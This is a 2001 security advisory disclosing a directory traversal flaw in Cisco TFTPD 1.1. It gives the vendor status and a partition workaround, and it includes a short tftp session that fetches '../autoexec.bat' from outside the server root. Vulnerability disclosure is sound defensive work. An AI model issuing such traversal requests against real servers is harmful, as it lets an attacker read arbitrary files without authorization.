Cisco TFTPD 1.1 Vulerablity

["Siberian" <siberian () splashpages de>]

[Sentry Research Labs - ID0201061701]
(c) 2001 by www.sentry-labs.com


Note:
This advisory is for information and educational purpouse only! We 
are not responsible for any abuse or damage resulting from these
information.

Author: 
Siberian

Topic: 
Security Bug in CISCO TFTPD server 1.1 

Vendor Status:
Informed (06/17/01)

Vendor URL: 
http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp

Preamble:
This software is some days old and I do not know if it is still supported, 
but it is a serious issue which should be reported. The bug itself is very 
common.

Issue:
TFTPD is vulnerable to some kind of primitve directory transversal
attack which allows a remote user to obtain any file from the target
system.

Exploit (using tftp client (Linux)):
tftp> connect target
tftp> get ../autoexec.bat
Recieved 218 bytes in 0.4 seconds
tftpd> quit

Workaround:
Install your base directory at another partition or Hardrive (not c:)